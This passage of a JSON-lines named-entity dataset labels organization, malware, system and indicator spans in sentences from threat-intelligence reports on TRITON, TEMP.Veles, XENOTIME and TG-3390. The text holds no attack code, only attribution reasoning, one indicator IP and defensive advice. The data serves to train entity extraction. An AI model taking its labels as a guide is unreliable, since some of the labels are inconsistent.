cast upon the wall of the cave , these two definitions ( XENOTIME and TEMP.Veles , both presumably referring to \u201c the TRITON actor \u201d ) describe the same phenomena , yet at the same time appear different .", "spans": [{"start": 113, "end": 121, "label": "Organization"}, {"start": 126, "end": 136, "label": "Organization"}, {"start": 174, "end": 180, "label": "Malware"}]} {"text": "This question of perception and accuracy rests upon the underlying epistemic framework and the goal conceived for that framework in defining an adversary 
: FireEye \u2019s methodology follows a deductive approach requiring the collection of significant evidence over time to yield a conclusion that will be necessary given the premises ( the totality of evidence suggests APTxx ) ; the Dragos approach instead seeks an inductive approach , where premises may all be true but the conclusion need not necessarily follow from them given changes in premises over time or other observations not contained within the set ( thus , identified behaviors strongly suggests an activity group , defined as X ) .", "spans": [{"start": 156, "end": 163, "label": "Organization"}, {"start": 381, "end": 387, "label": "Organization"}]} {"text": "From an external analysts \u2019 point of view , the wonder is , which is superior to the other .", "spans": []} {"text": "And my answer for this is : neither is perfect , but both are useful \u2013 depending upon your goals and objectives .", "spans": []} {"text": "But rather than trying to pursue some comparison between the two for identification of superiority ( an approach that will result in unproductive argument and social media warring ) , the point of this post is to highlight the distinctions between these approaches and how \u2013 in the case of \u201c the TRITON actor \u201d \u2013 they result in noticeably different conclusions from similar datasets .", "spans": [{"start": 296, "end": 302, "label": "Malware"}]} {"text": "One reason for the distinction may be differences in evidence , as FireEye \u2019s public reporting notes two distinct events of which they are aware of and have responded to related to \u201c the TRITON actor \u201d while Dragos has been engaged several instances \u2013 thus , Dragos would possess more evidence to cement the definition of an activity group , while FireEye \u2019s data collection-centric approach would require far more observations to yield an \u201c APT \u201d .", "spans": [{"start": 67, "end": 74, "label": "Organization"}, {"start": 187, "end": 193, 
"label": "Malware"}, {"start": 208, "end": 214, "label": "Organization"}, {"start": 259, "end": 265, "label": "Organization"}, {"start": 348, "end": 355, "label": "Organization"}]} {"text": "Yet irrespective of this , it is confusing why the previously-declared \u201c TEMP \u201d category was walked back as this has led to not small amount of confusion \u2013 in both technical and non-technical audiences \u2013 as to just what FireEye \u2019s blog post refers .", "spans": [{"start": 220, "end": 227, "label": "Organization"}]} {"text": "Thus respected journalists ( at least by me ) conflate the \u201c TRITON actor is active at another site \u201d with \u201c TRITON malware was identified at another site \u201d .", "spans": [{"start": 61, "end": 67, "label": "Malware"}, {"start": 109, "end": 115, "label": "Malware"}]} {"text": "In this case , we \u2019re seeing a definite problem with the overly-conservative naming approach used as it engenders confusion in a significant subset of the intended audience .", "spans": []} {"text": "While some may dismiss adversary or activity naming as so much marketing , having a distinct label for something allows for clearer communication and more accurate discussion .", "spans": []} {"text": "Furthermore , conflating adversaries with tools , since tools can be repurposed or used by other entities than those first observed deploying them , leads to further potential confusion as the \u201c X actor \u201d is quickly compressed in the minds of some to refer to any and all instantiations of tool \u201c X \u201d .", "spans": []} {"text": "Overall , the discussion above may appear so much splitting of hairs or determining how many angels can dance on the head of a pin \u2013 yet given the communicative impacts behind different naming and labeling conventions , this exploration seems not merely useful but necessary .", "spans": []} {"text": "Understanding the \u201c how \u201d and \u201c why \u201d behind different entity classifications 
of similar ( or even the same ) activity allows us to move beyond the dismissive approach of \u201c everyone has their names for marketing purposes \u201d to a more productive mindset that grasps the fundamental methodologies that ( should ) drive these decisions .", "spans": []} {"text": "TRITON Attribution : Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 95, "end": 101, "label": "Malware"}]} {"text": "In a previous blog post we detailed the TRITON intrusion that impacted industrial control systems ( ICS ) at a critical infrastructure facility .", "spans": [{"start": 40, "end": 46, "label": "Malware"}, {"start": 71, "end": 97, "label": "System"}, {"start": 100, "end": 103, "label": "System"}]} {"text": "We now track this activity set as TEMP.Veles .", "spans": [{"start": 34, "end": 44, "label": "Organization"}]} {"text": "In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute .", "spans": [{"start": 60, "end": 70, "label": "Organization"}, {"start": 106, "end": 112, "label": "Malware"}]} {"text": "FireEye Intelligence assesses with high confidence that intrusion activity that led to deployment of TRITON was supported by the Central Scientific Research Institute of Chemistry and Mechanics ( CNIIHM ; a.k.a. 
\u0426\u041d\u0418\u0418\u0425\u041c ) , a Russian government-owned technical research institution located in Moscow .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 101, "end": 107, "label": "Malware"}, {"start": 129, "end": 193, "label": "Organization"}, {"start": 196, "end": 202, "label": "Organization"}, {"start": 212, "end": 218, "label": "Organization"}]} {"text": "The following factors supporting this assessment are further detailed in this post .", "spans": []} {"text": "We present as much public information as possible to support this assessment , but withheld sensitive information that further contributes to our high confidence assessment .", "spans": []} {"text": "FireEye uncovered malware development activity that is very likely supporting TEMP.Veles activity .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 78, "end": 88, "label": "Organization"}]} {"text": "This includes testing multiple versions of malicious software , some of which were used by TEMP.Veles during the TRITON intrusion .", "spans": [{"start": 91, "end": 101, "label": "Organization"}, {"start": 113, "end": 119, "label": "Malware"}]} {"text": "Investigation of this testing activity reveals multiple independent ties to Russia , CNIIHM , and a specific person in Moscow .", "spans": [{"start": 85, "end": 91, "label": "Organization"}]} {"text": "This person \u2019s online activity shows significant links to CNIIHM .", "spans": [{"start": 58, "end": 64, "label": "Organization"}]} {"text": "An IP address registered to CNIIHM has been employed by TEMP.Veles for multiple purposes , including monitoring open-source coverage of TRITON , network reconnaissance , and malicious activity in support of the TRITON intrusion .", "spans": [{"start": 28, "end": 34, "label": "Organization"}, {"start": 56, "end": 66, "label": "Organization"}, {"start": 136, "end": 142, "label": "Malware"}, {"start": 211, "end": 217, "label": "Malware"}]} {"text": "Behavior 
patterns observed in TEMP.Veles activity are consistent with the Moscow time zone , where CNIIHM is located .", "spans": [{"start": 30, "end": 40, "label": "Organization"}, {"start": 99, "end": 105, "label": "Organization"}]} {"text": "We judge that CNIIHM likely possesses the necessary institutional knowledge and personnel to assist in the orchestration and development of TRITON and TEMP.Veles operations .", "spans": [{"start": 14, "end": 20, "label": "Organization"}, {"start": 140, "end": 146, "label": "Malware"}, {"start": 151, "end": 161, "label": "Organization"}]} {"text": "While we cannot rule out the possibility that one or more CNIIHM employees could have conducted TEMP.Veles activity without their employer \u2019s approval , the details shared in this post demonstrate that this explanation is less plausible than TEMP.Veles operating with the support of the institute .", "spans": [{"start": 58, "end": 64, "label": "Organization"}, {"start": 96, "end": 106, "label": "Organization"}, {"start": 242, "end": 252, "label": "Organization"}]} {"text": "During our investigation of TEMP.Veles activity , we found multiple unique tools that the group deployed in the target environment .", "spans": [{"start": 28, "end": 38, "label": "Organization"}]} {"text": "Some of these same tools , identified by hash , were evaluated in a malware testing environment by a single user .", "spans": []} {"text": "Malware Testing Environment Tied to TEMP.Veles .", "spans": [{"start": 36, "end": 46, "label": "Organization"}]} {"text": "We identified a malware testing environment that we assess with high confidence was used to refine some TEMP.Veles tools .", "spans": [{"start": 104, "end": 114, "label": "Organization"}]} {"text": "At times , the use of this malware testing environment correlates to in-network activities of TEMP.Veles , demonstrating direct operational support for intrusion activity .", "spans": [{"start": 94, "end": 104, "label": "Organization"}]} {"text": "Four files 
tested in 2014 are based on the open-source project , cryptcat .", "spans": []} {"text": "Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates .", "spans": []} {"text": "One of these files was deployed in a TEMP.Veles target \u2019s network .", "spans": [{"start": 37, "end": 47, "label": "Organization"}]} {"text": "The compiled version with the least detections was later re-tested in 2017 and deployed less than a week later during TEMP.Veles activities in the target environment .", "spans": [{"start": 118, "end": 128, "label": "Organization"}]} {"text": "TEMP.Veles \u2019 lateral movement activities used a publicly-available PowerShell based tool , WMImplant .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 67, "end": 77, "label": "System"}, {"start": 91, "end": 100, "label": "System"}]} {"text": "On multiple dates in 2017 , TEMP.Veles struggled to execute this utility on multiple victim systems , potentially due to AV detection .", "spans": [{"start": 28, "end": 38, "label": "Organization"}]} {"text": "Soon after , the customized utility was again evaluated in the malware testing environment .", "spans": []} {"text": "The following day , TEMP.Veles again tried the utility on a compromised system .", "spans": [{"start": 20, "end": 30, "label": "Organization"}]} {"text": "The user has been active in the malware testing environment since at least 2013 , testing customized versions of multiple open-source frameworks , including Metasploit , Cobalt Strike , PowerSploit , and other projects .", "spans": [{"start": 157, "end": 167, "label": "System"}, {"start": 170, "end": 183, "label": "System"}, {"start": 186, "end": 197, "label": "System"}]} {"text": "The user \u2019s development patterns appear to pay particular attention to AV evasion and alternative code execution techniques .", "spans": []} {"text": "Custom payloads utilized by TEMP.Veles in investigations conducted by 
Mandiant are typically weaponized versions of legitimate open-source software , retrofitted with code used for command and control .", "spans": [{"start": 28, "end": 38, "label": "Organization"}, {"start": 70, "end": 78, "label": "Organization"}]} {"text": "Testing , Malware Artifacts , and Malicious Activity Suggests Tie to CNIIHM .", "spans": [{"start": 69, "end": 75, "label": "Organization"}]} {"text": "Multiple factors suggest that this activity is Russian in origin and associated with CNIIHM .", "spans": [{"start": 85, "end": 91, "label": "Organization"}]} {"text": "A PDB path contained in a tested file contained a string that appears to be a unique handle or user name .", "spans": [{"start": 2, "end": 5, "label": "System"}]} {"text": "This moniker is linked to a Russia based person active in Russian information security communities since at least 2011 .", "spans": []} {"text": "The handle has been credited with vulnerability research contributions to the Russian version of Hacker Magazine ( \u0445\u0430\u043a\u0435\u0440 ) .", "spans": []} {"text": "According to a now-defunct social media profile , the same individual was a professor at CNIIHM , which is located near Nagatinskaya Street in the Nagatino-Sadovniki district of Moscow .", "spans": [{"start": 89, "end": 95, "label": "Organization"}]} {"text": "Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile .", "spans": []} {"text": "Suspected TEMP.Veles incidents include malicious activity originating from 87.245.143.140 , which is registered to CNIIHM .", "spans": [{"start": 10, "end": 20, "label": "Organization"}, {"start": 75, "end": 89, "label": "Indicator"}, {"start": 115, "end": 121, "label": "Organization"}]} {"text": "This IP address has been used to monitor open-source coverage of TRITON , heightening the probability of an interest by unknown subjects , originating from this network , in 
TEMP.Veles related activities .", "spans": [{"start": 65, "end": 71, "label": "Malware"}, {"start": 174, "end": 184, "label": "Organization"}]} {"text": "It also has engaged in network reconnaissance against targets of interest to TEMP.Veles .", "spans": [{"start": 77, "end": 87, "label": "Organization"}]} {"text": "The IP address has been tied to additional malicious activity in support of the TRITON intrusion .", "spans": [{"start": 80, "end": 86, "label": "Malware"}]} {"text": "Multiple files have Cyrillic names and artifacts .", "spans": []} {"text": "Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow , lending some further support to the scenario that CNIIHM , a Russian research organization in Moscow , has been involved in TEMP.Veles activity .", "spans": [{"start": 51, "end": 61, "label": "Organization"}, {"start": 144, "end": 150, "label": "Organization"}, {"start": 218, "end": 228, "label": "Organization"}]} {"text": "We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target \u2019s network .", "spans": []} {"text": "These file creation times conform to a work schedule typical of an actor operating within a UTC+3 time zone supporting a proximity to Moscow .", "spans": []} {"text": "Additional language artifacts recovered from TEMP.Veles toolsets are also consistent with such a regional nexus .", "spans": [{"start": 45, "end": 55, "label": "Organization"}]} {"text": "A ZIP archive recovered during our investigations , schtasks.zip , contained an installer and uninstaller of CATRUNNER that includes two versions of an XML scheduled task definitions for a masquerading service \u2018 ProgramDataUpdater . 
\u2019 The malicious installation version has a task name and description in English , and the clean uninstall version has a task name and description in Cyrillic .", "spans": [{"start": 2, "end": 5, "label": "System"}, {"start": 52, "end": 64, "label": "Indicator"}, {"start": 109, "end": 118, "label": "Malware"}, {"start": 152, "end": 155, "label": "System"}, {"start": 212, "end": 230, "label": "System"}]} {"text": "The timeline of modification dates within the ZIP also suggest the actor changed the Russian version to English in sequential order , heightening the possibility of a deliberate effort to mask its origins .", "spans": [{"start": 46, "end": 49, "label": "System"}]} {"text": "While we know that TEMP.Veles deployed the TRITON attack framework , we do not have specific evidence to prove that CNIIHM did ( or did not ) develop the tool .", "spans": [{"start": 19, "end": 29, "label": "Organization"}, {"start": 43, "end": 49, "label": "Malware"}, {"start": 116, "end": 122, "label": "Organization"}]} {"text": "We infer that CNIIHM likely maintains the institutional expertise needed to develop and prototype TRITON based on the institute \u2019s self-described mission and other public information .", "spans": [{"start": 14, "end": 20, "label": "Organization"}, {"start": 98, "end": 104, "label": "Malware"}]} {"text": "CNIIHM has at least two research divisions that are experienced in critical infrastructure , enterprise safety , and the development of weapons/military equipment :", "spans": [{"start": 0, "end": 6, "label": "Organization"}]} {"text": "The Center for Applied Research creates means and methods for protecting critical infrastructure from destructive information and technological impacts .", "spans": [{"start": 0, "end": 31, "label": "Organization"}]} {"text": "The Center for Experimental Mechanical Engineering develops weapons as well as military and special equipment .", "spans": [{"start": 0, "end": 50, "label": "Organization"}]} {"text": "It also 
researches methods for enabling enterprise safety in emergency situations .", "spans": []} {"text": "CNIIHM officially collaborates with other national technology and development organizations , including :", "spans": [{"start": 0, "end": 6, "label": "Organization"}]} {"text": "The Moscow Institute of Physics and Technology ( PsyTech ) , which specializes in applied physics , computing science , chemistry , and biology .", "spans": [{"start": 24, "end": 46, "label": "Organization"}, {"start": 49, "end": 56, "label": "Organization"}]} {"text": "The Association of State Scientific Centers \u201c Nauka , \u201d which coordinates 43 Scientific Centers of the Russian Federation ( SSC RF ) .", "spans": [{"start": 0, "end": 43, "label": "Organization"}, {"start": 46, "end": 51, "label": "Organization"}, {"start": 77, "end": 95, "label": "Organization"}, {"start": 103, "end": 121, "label": "Organization"}, {"start": 124, "end": 127, "label": "Organization"}, {"start": 128, "end": 130, "label": "Organization"}]} {"text": "Some of its main areas of interest include nuclear physics , computer science and instrumentation , robotics and engineering , and electrical engineering , among others .", "spans": []} {"text": "The Federal Service for Technical and Export Control ( FTEC ) which is responsible for export control , intellectual property , and protecting confidential information .", "spans": [{"start": 4, "end": 52, "label": "Organization"}, {"start": 55, "end": 59, "label": "Organization"}]} {"text": "The Russian Academy of Missile and Artillery Sciences ( PAPAH ) which specializes in research and development for strengthening Russia \u2019s defense industrial complex .", "spans": [{"start": 4, "end": 53, "label": "Organization"}, {"start": 56, "end": 61, "label": "Organization"}]} {"text": "Information from a Russian recruitment website , linked to CNIIHM \u2019s official domain , indicates that CNIIHM is also dedicated to the development of intelligent systems for 
computer-aided design and control , and the creation of new information technologies .", "spans": [{"start": 59, "end": 65, "label": "Organization"}, {"start": 102, "end": 108, "label": "Organization"}]} {"text": "Some possibility remains that one or more CNIIHM employees could have conducted the activity linking TEMP.Veles to CNIIHM without their employer \u2019s approval .", "spans": [{"start": 42, "end": 48, "label": "Organization"}, {"start": 101, "end": 111, "label": "Organization"}, {"start": 115, "end": 121, "label": "Organization"}]} {"text": "However , this scenario is highly unlikely .", "spans": []} {"text": "In this scenario , one or more persons \u2013 likely including at least one CNIIHM employee , based on the moniker discussed above \u2013 would have had to conduct extensive , high-risk malware development and intrusion activity from CNIIHM \u2019s address space without CNIIHM \u2019s knowledge and approval over multiple years .", "spans": [{"start": 71, "end": 77, "label": "Organization"}, {"start": 224, "end": 230, "label": "Organization"}, {"start": 256, "end": 262, "label": "Organization"}]} {"text": "CNIIHM \u2019s characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 102, "end": 112, "label": "Organization"}]} {"text": "TRITON is a highly specialized framework whose development would be within the capability of a low percentage of intrusion operators .", "spans": [{"start": 0, "end": 6, "label": "Malware"}]} {"text": "Xenotime .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]} {"text": "Release_Time : unknown", "spans": []} {"text": "Report_URL : https://dragos.com/resource/xenotime/", "spans": []} {"text": "XENOTIME is easily the most dangerous threat activity publicly known .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]} {"text": "It is the only activity group intentionally 
compromising and disrupting industrial safety instrumented systems , which can lead to scenarios involving loss of life and environmental damage .", "spans": []} {"text": "Dragos identified several compromises of ICS vendors and manufacturers in 2018 by activity associated with XENOTIME , providing potential supply chain threat opportunities and vendor-enabled access to asset owner and operator ICS networks .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 41, "end": 44, "label": "System"}, {"start": 107, "end": 115, "label": "Organization"}, {"start": 226, "end": 229, "label": "System"}]} {"text": "XENOTIME rose to prominence in December 2017 when Dragos and FireEye jointly published details of TRISIS destructive malware targeting Schneider Electric \u2019s Triconex safety instrumented system .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 50, "end": 56, "label": "Organization"}, {"start": 61, "end": 68, "label": "Organization"}, {"start": 98, "end": 104, "label": "Malware"}, {"start": 135, "end": 153, "label": "Organization"}, {"start": 157, "end": 165, "label": "System"}]} {"text": "The multi-step malware framework caused industrial systems in a Middle Eastern industrial facility to shut down .", "spans": []} {"text": "The incident represented a shift in the capabilities and consequences of ICS malware .", "spans": [{"start": 73, "end": 76, "label": "System"}]} {"text": "TRISIS was an escalation of the type of attacks historically targeting ICS systems .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 71, "end": 74, "label": "System"}]} {"text": "Targeting a safety system indicates significant damage and loss of human life were either intentional or acceptable goals of the attack , a consequence not seen in previous disruptive attacks such as the 2016 CRASHOVERRIDE malware that caused a power loss in Ukraine .", "spans": [{"start": 209, "end": 222, "label": "Malware"}]} {"text": "Note : Industrial 
safety instrumented systems comprise part of a multi-layer engineered process control framework to protect life and environment .", "spans": []} {"text": "Industrial safety systems are highly redundant and separate controls which override and manage industrial processes if they approach unsafe conditions such as over-pressurization , overspeed , or over-heating .", "spans": []} {"text": "They enable engineers and operators to safely control and possibly shutdown processes before a major incident occurs .", "spans": []} {"text": "They \u2019re a critical component of many dangerous industrial environments such as electric power generation and oil and gas processing .", "spans": []} {"text": "XENOTIME configured TRISIS based on the specifics and functions of the Triconex system within the industrial control ( ICS ) environment .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 20, "end": 26, "label": "Malware"}, {"start": 71, "end": 79, "label": "System"}, {"start": 98, "end": 116, "label": "System"}, {"start": 119, "end": 122, "label": "System"}]} {"text": "XENOTIME used credential capture and replay to move between networks , Windows commands , standard command-line tools such as PSExec , and proprietary tools for operations on victim hosts . ( Full reports detailing XENOTIME \u2019s tool techniques , and procedures are available to Dragos WorldView customers . 
) Because the TRISIS malware framework was highly tailored , it would have required specific knowledge of the Triconex \u2019s infrastructure and processes within a specific plant .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 71, "end": 78, "label": "System"}, {"start": 126, "end": 132, "label": "System"}, {"start": 215, "end": 223, "label": "Organization"}, {"start": 277, "end": 283, "label": "Organization"}, {"start": 284, "end": 293, "label": "System"}, {"start": 320, "end": 326, "label": "Malware"}, {"start": 416, "end": 424, "label": "System"}]} {"text": "This means it \u2019s not easy to scale\u2014however , the malware provides a blueprint of how to target safety instrumented systems .", "spans": []} {"text": "This tradecraft is thus scalable and available to others even if the malware itself changes .", "spans": []} {"text": "Dragos \u2019 data indicates XENOTIME remains active .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 24, "end": 32, "label": "Organization"}]} {"text": "Furthermore , Dragos \u2019 analysis of the TRISIS event continues as we recover additional data surrounding the incident .", "spans": [{"start": 14, "end": 20, "label": "Organization"}, {"start": 39, "end": 45, "label": "Malware"}]} {"text": "Dragos assesses with moderate confidence that XENOTIME intends to establish required access and capability to cause a potential , future disruptive\u2014or even destructive\u2014event .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 46, "end": 54, "label": "Organization"}]} {"text": "Compromising safety systems provides little value outside of disrupting operations .", "spans": []} {"text": "The group created a custom malware framework and tailormade credential gathering tools , but an apparent misconfiguration prevented the attack from executing properly .", "spans": []} {"text": "As XENOTIME matures , it is less likely that the group will make this mistake in the future 
.", "spans": [{"start": 3, "end": 11, "label": "Organization"}]} {"text": "XENOTIME operates globally , impacting regions far outside of the Middle East , their initial target .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]} {"text": "Intelligence suggests the group has been active since at least 2014 and is presently operating in multiple facilities targeting safety systems beyond Triconex .", "spans": [{"start": 150, "end": 158, "label": "System"}]} {"text": "This group has no known associations to other activity groups .", "spans": []} {"text": "Dragos threat intelligence leverages the Dragos Platform , our threat operations center , and other sources to provide comprehensive insight into threats affecting industrial control security and safety worldwide .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 41, "end": 47, "label": "Organization"}]} {"text": "Dragos does not corroborate nor conduct political attribution to threat activity .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]} {"text": "Dragos instead focuses on threat behaviors and appropriate detection and response .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]} {"text": "Read more about Dragos \u2019 approach to categorizing threat activity and attribution .", "spans": [{"start": 16, "end": 22, "label": "Organization"}]} {"text": "Dragos does not publicly describe ICS activity group technical details except in extraordinary circumstances in order to limit tradecraft proliferation .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 34, "end": 37, "label": "System"}]} {"text": "However , full details on XENOTIME and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView .", "spans": [{"start": 26, "end": 34, "label": "Organization"}, {"start": 142, "end": 148, "label": "Organization"}, {"start": 149, "end": 158, "label": "System"}]} {"text": "Threat 
Group 3390 Cyberespionage .", "spans": [{"start": 0, "end": 17, "label": "Organization"}]} {"text": "Dell SecureWorks Counter Threat Unit (TM ) ( CTU ) researchers investigated activities associated with Threat Group-3390 ( TG-3390 ) .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 5, "end": 36, "label": "Organization"}, {"start": 45, "end": 48, "label": "Organization"}, {"start": 103, "end": 120, "label": "Organization"}]} {"text": "Analysis of TG-3390 's operations , targeting , and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China .", "spans": [{"start": 12, "end": 19, "label": "Organization"}, {"start": 62, "end": 65, "label": "Organization"}, {"start": 141, "end": 158, "label": "Organization"}]} {"text": "The threat actors target a wide range of organizations : CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects , but also targeting other industry verticals and attacking organizations involved in international relations .", "spans": [{"start": 57, "end": 60, "label": "Organization"}, {"start": 87, "end": 94, "label": "Organization"}]} {"text": "The group extensively uses long-running strategic web compromises ( SWCs ) , and relies on whitelists to deliver payloads to select victims .", "spans": []} {"text": "In comparison to other threat groups , TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger .", "spans": [{"start": 39, "end": 46, "label": "Organization"}, {"start": 89, "end": 98, "label": "Organization"}, {"start": 99, "end": 107, "label": "System"}]} {"text": "CTU researchers divided the threat intelligence about TG-3390 into two sections : strategic and tactical .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 54, "end": 61, "label": "Organization"}]} {"text": "Strategic threat intelligence includes an assessment of 
the ongoing threat posed by the threat group .", "spans": []} {"text": "Executives can use this assessment to determine how to reduce risk to their organization's mission and critical assets .", "spans": []} {"text": "Tactical threat intelligence is based on incident response investigations and research , and is mapped to the kill chain .", "spans": []} {"text": "Computer network defenders can use this information to reduce the time and effort associated with responding to TG-3390 .", "spans": [{"start": 112, "end": 119, "label": "Organization"}]} {"text": "CTU researchers assess with moderate confidence that TG-3390 is based in the People's Republic of China .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 53, "end": 60, "label": "Organization"}, {"start": 77, "end": 94, "label": "Organization"}]} {"text": "CTU researchers have evidence that the threat group compromised U.S. and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]} {"text": "Based on analysis of the group's SWCs , TG-3390 operations likely affect organizations in other countries and verticals .", "spans": [{"start": 33, "end": 37, "label": "System"}, {"start": 40, "end": 47, "label": "Organization"}]} {"text": "TG-3390 operates a broad and long-running campaign of SWCs and has compromised approximately 100 websites as of this publication .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 54, "end": 58, "label": "System"}]} {"text": "Through an IP address whitelisting process , the threat group selectively targets visitors to these websites .", "spans": []} {"text": "After the initial compromise , TG-3390 delivers the HttpBrowser backdoor to its victims .", "spans": [{"start": 31, 
"end": 38, "label": "Organization"}, {"start": 52, "end": 72, "label": "Malware"}]} {"text": "The threat actors then move quickly to compromise Microsoft Exchange servers and to gain complete control of the target environment .", "spans": [{"start": 50, "end": 59, "label": "Organization"}, {"start": 60, "end": 68, "label": "System"}]} {"text": "The threat actors are adept at identifying key data stores and selectively exfiltrating all of the high-value information associated with their goal .", "spans": []} {"text": "CTU researchers recommend the following practices to prevent or detect TG-3390 intrusions :", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 71, "end": 78, "label": "Organization"}]} {"text": "Search web log files for evidence of web server scanning using the URIs listed in the Exploitation section and evidence of Exfiltration using the User-Agent in the Actions on objective section .", "spans": [{"start": 146, "end": 156, "label": "System"}]} {"text": "Require two-factor authentication for all remote access solutions , including OWA .", "spans": [{"start": 78, "end": 81, "label": "System"}]} {"text": "Audit ISAPI filters and search for web shells on Microsoft Exchange servers .", "spans": [{"start": 6, "end": 11, "label": "System"}, {"start": 49, "end": 58, "label": "Organization"}, {"start": 59, "end": 67, "label": "System"}]} {"text": "CTU researchers infer intent by aggregating observations , analyzing a threat group's activity , and placing the information in a wider context .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]} {"text": "Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization's vertical or demographic to increase the likelihood of finding victims with relevant information .", "spans": [{"start": 26, "end": 33, "label": "Organization"}, {"start": 43, "end": 68, "label": "System"}, 
{"start": 71, "end": 75, "label": "System"}]} {"text": "CTU researchers assess with high confidence that TG-3390 uses information gathered from prior reconnaissance activities to selectively compromise users who visit websites under its control .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 49, "end": 56, "label": "Organization"}]} {"text": "Most websites compromised by TG-3390 actors are affiliated with five types of organizations around the world :", "spans": [{"start": 29, "end": 36, "label": "Organization"}]} {"text": "large manufacturing companies , particularly those supplying defense organizations , energy companies , embassies in Washington , DC representing countries in the Middle East , Europe , and Asia , likely to target U.S. based users involved in international relations , non-governmental organizations ( NGOs ) , particularly those focused on international relations and defense , government organizations .", "spans": [{"start": 130, "end": 132, "label": "Organization"}]} {"text": "Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs .", "spans": [{"start": 28, "end": 31, "label": "Organization"}, {"start": 56, "end": 63, "label": "Organization"}]} {"text": "To assess attribution , CTU researchers analyze observed activity , third-party reporting , and contextual intelligence .", "spans": [{"start": 24, "end": 27, "label": "Organization"}]} {"text": "For the following reasons , CTU researchers assess with moderate confidence that TG-3390 has a Chinese nexus :", "spans": [{"start": 28, "end": 31, "label": "Organization"}, {"start": 81, "end": 88, "label": "Organization"}]} {"text": "The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": [{"start": 4, 
"end": 7, "label": "System"}]} {"text": "Threat groups outside of China are unlikely to target the Uyghur people .", "spans": []} {"text": "TG-3390 uses the PlugX remote access tool .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 17, "end": 22, "label": "Malware"}]} {"text": "The menus for PlugX 's server-side component are written exclusively in Standard Chinese ( Mandarin ) , suggesting that PlugX operators are familiar with this language .", "spans": [{"start": 14, "end": 19, "label": "Malware"}, {"start": 72, "end": 88, "label": "System"}, {"start": 91, "end": 99, "label": "System"}, {"start": 120, "end": 125, "label": "Malware"}]} {"text": "CTU researchers have observed TG-3390 activity between 04:00 and 09:00 UTC , which is 12:00 to 17:00 local time in China ( UTC +8 ) .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 30, "end": 37, "label": "Organization"}]} {"text": "The timeframe maps to the second half of the workday in China .", "spans": []} {"text": "The threat actors have used the Baidu search engine , which is only available in Chinese , to conduct reconnaissance activities .", "spans": [{"start": 32, "end": 37, "label": "System"}]} {"text": "CTU researchers have observed the threat group obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. 
military capability , or both .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]} {"text": "CTU researchers recognize that the evidence supporting this attribution is circumstantial .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]} {"text": "It is possible that TG-3390 is a false-flag operation by a threat group outside of China that is deliberately planting indications of a Chinese origin .", "spans": [{"start": 20, "end": 27, "label": "Organization"}]} {"text": "TG-3390 has access to proprietary tools , some of which are used exclusively by TG-3390 and others that are shared among a few Chinese threat groups .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 80, "end": 87, "label": "Organization"}]} {"text": "The complexity and continual development of these tools indicate a mature development process .", "spans": []} {"text": "TG-3390 can quickly leverage compromised network infrastructure during an operation and can conduct simultaneous intrusions into multiple environments .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]} {"text": "This ability is further demonstrated by analysis of interactions between TG-3390 operators and a target environment .", "spans": [{"start": 73, "end": 80, "label": "Organization"}]} {"text": "CTU researchers found no evidence of multiple operators working simultaneously against a single organization .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]} {"text": "This efficiency of operation ( a 1:1 ratio of operator to observed activity ) suggests that TG-3390 can scale to conduct the maximum number of simultaneous operations .", "spans": [{"start": 92, "end": 99, "label": "Organization"}]} {"text": "These characteristics suggest that the threat group is well-resourced and has access to a tools 